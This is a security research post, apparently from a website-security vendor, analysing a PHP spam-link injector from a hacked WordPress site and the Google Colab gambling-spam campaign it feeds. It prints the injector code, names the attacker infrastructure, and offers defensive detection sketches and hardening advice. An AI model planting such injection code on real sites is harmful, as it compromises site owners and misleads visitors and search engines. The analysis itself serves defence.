This investigation started with a small and quite simple piece of PHP malware found on a hacked website. We located the following PHP code, responsible for injecting spammy links, within a wp-includes.php file:
<?php
$lines = file('https://4ip[.]su/db/links.txt');
shuffle($lines);
$data = array_rand($lines, 900);
echo '<p>';
foreach($data as $value) {
    $rand = substr(md5(microtime()),rand(0,26),6);
    echo '<a href="'.$lines[$value].'">'.$rand.'</a> ';
};
echo '</p>';
?>
This script fetches a list of links from a remote location (hxxps://4ip[.]su/db/links.txt) and then injects some of them into a web page. It is quite a simple piece of malware, and this kind of behavior is something we commonly find on hacked websites.
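One way to hunt for this kind of injector is to look for PHP code that reads a literal remote URL. The following is a minimal sketch, not a complete malware scanner: the function name `find_remote_reads`, the regular expression, and the `example.invalid` URL are assumptions made for illustration, and real malware is often obfuscated in ways this pattern will not catch.

```python
import re

# Heuristic (assumption): flag file(), file_get_contents(), or fopen()
# when the first argument is a literal http(s) URL.
REMOTE_READ = re.compile(
    r"""\b(file_get_contents|fopen|file)\s*\(\s*['"]https?://""",
    re.IGNORECASE,
)

def find_remote_reads(php_source: str) -> list[str]:
    """Return the names of functions called with a literal remote URL."""
    return [m.group(1).lower() for m in REMOTE_READ.finditer(php_source)]

# Placeholder sample modeled on the injector; the URL is hypothetical.
sample = "<?php $lines = file('https://example.invalid/links.txt'); shuffle($lines); ?>"
print(find_remote_reads(sample))
```

A match is only a reason to review the file manually, since legitimate plugins also fetch remote resources.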
Nonetheless, the details were much more interesting.
900 injected spam links
It is quite common for spammy injections to have 5-10 links. Sometimes, we even see several dozen injected links. In extremely rare circumstances, we find more than a hundred links on a single page.
But in this case, the script injects exactly 900 links! The following code selects 900 random links from the downloaded list and then creates <a> tags for them to place on the web page.
$data = array_rand($lines, 900);
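Because the injection is so large, simply counting the links in a rendered page can expose it. The sketch below uses Python's standard `html.parser` module; the `LinkCounter` class, the `count_links` helper, and the threshold of 100 links are illustrative assumptions (the threshold is loosely based on the observation that more than a hundred injected links is extremely rare), not a tuned detection rule.

```python
from html.parser import HTMLParser

class LinkCounter(HTMLParser):
    """Collects the href value of every <a> tag it sees."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)

def count_links(html: str) -> int:
    """Return the number of <a href=...> tags in the given HTML."""
    parser = LinkCounter()
    parser.feed(html)
    parser.close()
    return len(parser.hrefs)

LINK_THRESHOLD = 100  # assumption: pages above this deserve a closer look

# Synthetic page imitating the injected <p> block with 900 links.
page = "<p>" + "".join(
    f'<a href="https://example.invalid/{i}">x</a> ' for i in range(900)
) + "</p>"
n = count_links(page)
print(n, n > LINK_THRESHOLD)
```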
The list is even bigger: 141,000+ links
900 links is already quite impressive, but we know that they are randomly selected from an even bigger list downloaded from (hxxps://4ip[.]su/db/links.txt). The question is, how much bigger is this list — and what exactly is on it?
It’s time to check the contents of the 4ip[.]su text file:
What we see is quite surprising:
- All links point to colab.research.google.com
- The total number of spam links is 141,341!
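A list like this can be summarized by counting entries per hostname. The following sketch shows one way to do that with the standard library; the `hosts_by_count` helper and the sample URLs (with placeholder document IDs) are assumptions for illustration and are not taken from the actual list.

```python
from collections import Counter
from urllib.parse import urlsplit

def hosts_by_count(lines):
    """Count non-empty URL lines per hostname."""
    hosts = Counter()
    for line in lines:
        url = line.strip()
        if not url:
            continue  # skip blank lines
        hosts[urlsplit(url).hostname or "(no host)"] += 1
    return hosts

# Placeholder data; the document IDs are hypothetical.
sample_lines = [
    "https://colab.research.google.com/drive/EXAMPLE_ID_1\n",
    "https://colab.research.google.com/drive/EXAMPLE_ID_2\n",
    "\n",
]
counts = hosts_by_count(sample_lines)
print(sum(counts.values()), counts.most_common(1))
```

If every entry shares one hostname, as in this campaign, `most_common(1)` accounts for the whole total.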
Gambling spam on Google Colaboratory
All 141,341 URLs in the list point to Google Colaboratory documents in Russian with hyperlinks to online gambling sites.
Google Colaboratory (or Colab) is a lesser-known Google application that, along with the more popular Google Docs and Google Sheets, allows you to create documents in Google Drive and collaborate with other people.
Colab is basically a cloud-based version of the Jupyter notebook environment, aimed mainly at students and data scientists. It allows them to write and execute Python code in a web browser and collaborate on their projects with an unlimited number of people.
The Colab documents (notebooks) combine executable Python code and rich text along with images and HTML. The documents are stored in the Google Drive account of their author, who can share them just like any other Google Drive document.
The bad actors abused Colab by creating notebooks that only contain spammy content (text, images, and hyperlinks) without any Python code whatsoever. The documents are shared so that anyone with the link can open them.
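Since a notebook file is JSON with a list of cells, each tagged with a `cell_type`, the absence of code is easy to check programmatically. The sketch below is illustrative only: the helper names `cell_type_counts` and `is_text_only` and the sample notebook are assumptions, and a notebook without code cells is not necessarily spam.

```python
import json

def cell_type_counts(notebook_json: str) -> dict:
    """Count the cells in an .ipynb document by their cell_type."""
    nb = json.loads(notebook_json)
    counts = {}
    for cell in nb.get("cells", []):
        kind = cell.get("cell_type", "unknown")
        counts[kind] = counts.get(kind, 0) + 1
    return counts

def is_text_only(notebook_json: str) -> bool:
    """True if the notebook has at least one cell and no code cells."""
    counts = cell_type_counts(notebook_json)
    return bool(counts) and counts.get("code", 0) == 0

# Hypothetical notebook with a single markdown cell and no code.
sample_nb = json.dumps({
    "nbformat": 4,
    "nbformat_minor": 0,
    "metadata": {},
    "cells": [
        {"cell_type": "markdown", "metadata": {},
         "source": ["[placeholder link](https://example.invalid/)"]},
    ],
})
print(cell_type_counts(sample_nb), is_text_only(sample_nb))
```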
Contents of spam .ipynb files
This is what the contents of the spammy notebook files (.ipynb) look like:
Many of these documents are interlinked, making discovery of them easier for search engines. Some of the links offer to download something (“Рискни скачать” translated as “take a chance and download”) — probably some gambling application.
However, something went wrong: when you click “Download” on any of these links, you get a 404 error from Google.
Inception and campaign duration
The Bitly link found in the notebooks (bit[.]ly/izzi_calab -> slotds[.]com/izzicolab) lets us estimate the time when this campaign started. The link was created on July 12, 2022, so the whole campaign should be about 1 year old.
Another hint about the beginning of the campaign is the time the 4ip[.]su domain was registered — June 23, 2022.
The 4ip[.]su server location is hidden by the Cloudflare proxy. However, we can see the email associated with this domain: seo2@jetmail[.]cc. A search reveals that the same email address is linked to one more similar domain, c64[.]su, which has been registered since September 22, 2020.
Google accounts used in black hat SEO campaign
Basically, hackers used Google Colaboratory as a tool to generate web pages with spammy links that are hosted for free on a reputable colab.research.google.com domain and can be indexed by search engines (including Google, of course).
While it’s true that storing documents on Google Drive is free, you should not forget that quotas apply (which is important when you create hundreds of thousands of documents) and that Google can easily remove all spammy documents at once if it detects the abuse of its services.
To work around both problems, the bad actor used multiple accounts to create and share the spammy Google Colab notebooks. This way, each account easily operates within the free quotas, and if an account is disabled by Google, only a limited number of spammy pages will be affected.
An interesting question is how many accounts were used in this particular black hat SEO campaign.
In Google Colab you can select the “View -> Notebook Info” menu to get information about the notebook owner (the account that created the notebook).
Creating or hacking 141,000 Google accounts is not an easy task, so we expected to see multiple documents created by the same accounts.
We checked a small number of random links. By the time we started consistently seeing documents created by already discovered accounts, we had collected a little over a hundred Gmail accounts participating in this black hat SEO campaign. This allows us to estimate around 1,000 spam documents per account.
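The per-account estimate is simple division of the list size by the number of accounts. The sketch below works through it for a few account counts; the values 100, 120, and 140 are hypothetical stand-ins for "a little over a hundred" and are not figures from the investigation.

```python
TOTAL_LINKS = 141_341  # size of the downloaded link list

def docs_per_account(total_docs: int, accounts: int) -> float:
    """Average number of documents per account."""
    return total_docs / accounts

# Hypothetical account counts (assumption, for illustration only).
for accounts in (100, 120, 140):
    print(accounts, round(docs_per_account(TOTAL_LINKS, accounts)))
```

Across this assumed range the average stays between roughly 1,000 and 1,400 documents per account, the same order of magnitude as the estimate above.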
The names (not emails) of the account owners can be found on the internet on various social media platforms. They belong to real individuals from all over the world, but mostly from Africa and Asia (some of the names are completely in Arabic).
It’s not clear at this point whether the accounts were hacked or hackers just scraped social networks for names of real people and then created fake accounts impersonating them. Given that there is no clear pattern between the names and email addresses, most likely these are hacked accounts of real people.
Campaign visibility in search results
Now, let’s estimate what the bad actors managed to achieve. If we search for the keywords found in the titles of the spammy documents, we inevitably find links to the Colab notebooks on the first page of Google search results.
If you search for names of the casinos on the Google Colab domain, you’ll find thousands of results for each of them. For example:
- site:colab.research.google.com “Jet casino” — 14,100 results
- site:colab.research.google.com “Izzzi Casino” — 32,000 results
- site:colab.research.google.com “Sol Casino” — 10,400 results
- site:colab.research.google.com “Rox Casino” — 10,700 results
- site:colab.research.google.com “Casino: ПОЛУЧИТЬ БОНУС” – 32,300 results
The word casino alone is found on about 100,000 Google Colab pages. The vast majority of them are spam.
You can easily find several other black hat SEO campaigns in different languages as well.
Other spam topics on Google Colab
After checking out these gambling spam pages on the Google Colab platform, we decided to check what other spam campaigns might be leveraging public Google Colab notebooks.
It turned out that many types of SEO spam can be easily found there just by searching Google for site:colab.research.google.com [keyword] and replacing [keyword] with some keywords associated with popular spam topics.
- Buy viagra — 1880 results
- Payday loan — 2830 results
- Write essay — 16,700 results
However, the majority of them came from the black hat SEO campaign that promotes the “read/watch/stream online” scams. These lure you in by offering something for free and then require you to pay $1 for a trial. Because of the fine print, you end up with a bunch of expensive and pretty useless subscriptions.
For example, the [“Read Book Here” “Download Book Here”] search currently returns 2,610,000 results from the Google Colab domain.
Closing thoughts
While Google’s free and open tools are undeniably valuable for collaboration (and innovation), it’s evident that complications arise when they become a haven for bad actors. Millions of documents with spam content on the Google Colab platform reveal that spammers have found yet another method to host doorways that they actively promote via spam link injections on compromised websites.
For website owners, the solution to this issue remains the same as with all other malware infections: do your absolute best to protect your environment from malware and known software vulnerabilities, and harden your website against attackers to prevent infection.
Some steps you can take to mitigate risk include:
- Regularly patch all of your website software (including plugins and themes) with the latest updates to help prevent exploitation of known vulnerabilities.
- Protect your admin and login pages with CAPTCHA, IP restrictions, and login attempt limits.
- Harden your website with configuration rules for your .htaccess file.
- Add security rules to your wp-config.php file to prevent attackers from being able to modify files directly through the dashboard or install malicious plugins.
- Use strong unique passwords for all of your accounts, including database, admin, and sFTP credentials.
- Monitor your website for indicators of compromise and set up file integrity control monitoring.
- Regularly make backups of your website and store them in a secure, off-site location for quick recovery.
- Use a web application firewall to mitigate brute force attacks and bad bots, and to help virtually patch known software vulnerabilities.
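As an illustration of the file integrity monitoring step in the list above, the following minimal sketch records a SHA-256 hash for every file under a directory and compares two snapshots. The `snapshot` and `diff_snapshots` helpers and the temporary demo directory are assumptions for illustration; a production setup would also need to store the baseline somewhere an attacker cannot modify it.

```python
import hashlib
import tempfile
from pathlib import Path

def snapshot(root: Path) -> dict[str, str]:
    """Map each file's path (relative to root) to its SHA-256 hash."""
    result = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            result[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return result

def diff_snapshots(old: dict[str, str], new: dict[str, str]) -> dict[str, list[str]]:
    """List files added, removed, or modified between two snapshots."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }

# Demo in a throwaway directory standing in for a website root.
with tempfile.TemporaryDirectory() as tmp:
    root = Path(tmp)
    (root / "index.php").write_text("<?php echo 'home'; ?>")
    baseline = snapshot(root)

    # Simulate a compromise: one file changed, one unexpected file added.
    (root / "index.php").write_text("<?php echo 'changed'; ?>")
    (root / "wp-includes.php").write_text("<?php /* unexpected file */ ?>")
    changes = diff_snapshots(baseline, snapshot(root))
    print(changes)
```

An unexpected new PHP file, such as the wp-includes.php file in this case, would show up in the "added" list.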